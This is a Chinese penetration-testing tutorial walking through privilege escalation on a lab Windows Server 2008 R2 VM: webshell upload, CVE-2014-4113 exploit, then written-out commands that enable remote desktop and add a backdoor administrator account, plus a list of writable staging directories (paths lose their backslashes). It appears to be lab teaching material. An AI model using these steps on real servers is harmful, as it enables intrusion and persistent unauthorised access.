111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]

admin 5G

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

一、Windows内核溢出提权[2008]

1、内核溢出提权背景:

       在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。

2、CVE-2014-4113-Exploit

       这个版本的提权工具,可以对winserver2008 的系统进行溢出提权

3、内核溢出提权过程:

(1)实验环境:

1.靶机环境:
(1)虚拟机Windows2008【target_sys.com】【192.168.97.131】
(2)脚本语言环境:php/asp语言环境存在

2.攻击机:
(1)虚拟机Win7【192.168.97.130】
(2)Firefox+Burpsuite+蚁剑+大马

3.网络环境:
(1)VMware搭建的NAT网络

(2)靶机链接:

URL:http://target_sys.com/upload.php

(3)实验过程:

第一步:访问靶机链接,利用MIME突破白名单类型限制,上传up.aspx大马在这里插入图片描述
【以上过程略】以下进行提权过程:

第二步:连接up.aspx大马【密码为admin】,并点击[CmdShell]模块,调用cmd.exe执行whoami命令,查看当前用户信息,发现权限很低
在这里插入图片描述
在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令:
在这里插入图片描述
第三步:点击[CmdShell]模块,调用cmd.exe执行systeminfo命令,把结果复制出来,然后利用wes.py脚本扫描漏洞,但是没有扫出来
在这里插入图片描述
扫描结果:扫描失败
在这里插入图片描述
第四步: 把systeminfo的信息放入该网址中,检索相关提权exp,最后发现CVE-2014-4113可以提权。同时我们通过msfconsole,键入search kernel也可以检索到一些exp,依次进入然后键入info,发现一些是2008R2的提权exp,下图中的ms14-058就是对应着CVE-2014-4113。

exp传送门
在这里插入图片描述

在这里插入图片描述
第五步:点击[File Manager]文件管理模块,上传rw.aspx用来扫描可读可写文件夹
在这里插入图片描述

第六步:访问刚刚上传的rw.aspx大马,扫描可读可写文件夹

如下图所示,我们扫描到了一些可读可写的文件夹,经过不完全测试,发现网站根目录下可以利用。

在这里插入图片描述
第七步:回到刚刚的大马,上传CVE-2014-4113-Exploit的exp到c:inetpubwwwroottarget_sys.com下
在这里插入图片描述
第八步:点击[CmdShell]模块,调用cmd执行刚刚传上去的cve-2017-4113的exp,如下所示,成功溢出

在这里插入图片描述
第九步: 依次执行以下命令,开启3389端口,新增管理员组用户demo1,最后再远程连接靶机。

/c c:inetpubwwwroottarget_sys.comWin64.exe "netstat -ano" #查看端口状态
在这里插入图片描述
/c c:inetpubwwwroottarget_sys.comWin64.exe "REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" #开启3389
在这里插入图片描述
/c c:inetpubwwwroottarget_sys.comWin64.exe "netstat -ano" #验证是否开启3389
在这里插入图片描述

/c c:inetpubwwwroottarget_sys.comWin64.exe "net user demo1 123 /add"#添加用户demo1/213
在这里插入图片描述
/c c:inetpubwwwroottarget_sys.comWin64.exe "net localgroup administrators demo1 /add" #把demo1用户加入管理员组
在这里插入图片描述

/c c:inetpubwwwroottarget_sys.comWin64.exe "net user" #验证demo1用户是否存在
在这里插入图片描述
mstsc远程桌面连接:

在这里插入图片描述

   附:常见可读写目录

≤2003可读写目录

C:RECYCLER
D:RECYCLER
E:RECYCLER
C:Windowstemp
C:WindowsDebug
C:WindowsRegistrationCRMLog
C:Documents and SettingsAll UsersDocuments

≥2008可读写目录

C:ProgramData
C:Windowstemp
C:WindowsTasks
C:Windowstracing    //不可删
C:WindowsdebugWIA
C:WindowsservicingSessions
C:WindowsservicingPackages
C:WindowsRegistrationCRMLog
C:WindowsSystem32spooldriverscolor
C:UsersDefaultAppData    //不可删
C:ProgramDataMicrosoftDeviceSync
C:ProgramDataMicrosoftCryptoDSSMachineKeys
C:ProgramDataMicrosoftCryptoRSAMachineKeys
C:ProgramDataMicrosoftUser Account Pictures    //不可删
C:UsersAll UsersMicrosoftNetFrameworkBreadcrumbStore    //不可删
C:ProgramDataMicrosoftWindowsWERReportArchive
C:WindowsSystem32MicrosoftCryptoRSAMachineKeys
C:Windowssyswow64tasksmicrosoftWindowsplasystem
C:WindowsMicrosoft.NETFrameworkv4.0.30319Temporary ASP.NET Files
C:WindowsMicrosoft.NETFramework64v2.0.50727Temporary ASP.NET Files
C:WindowsSystem32catroot2{127D0A1D-4EF2-11D1-8608-00C04FC295EE}
C:WindowsSystem32catroot2{F750E6C3-38EE-11D1-85E5-00C04FC295EE}

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>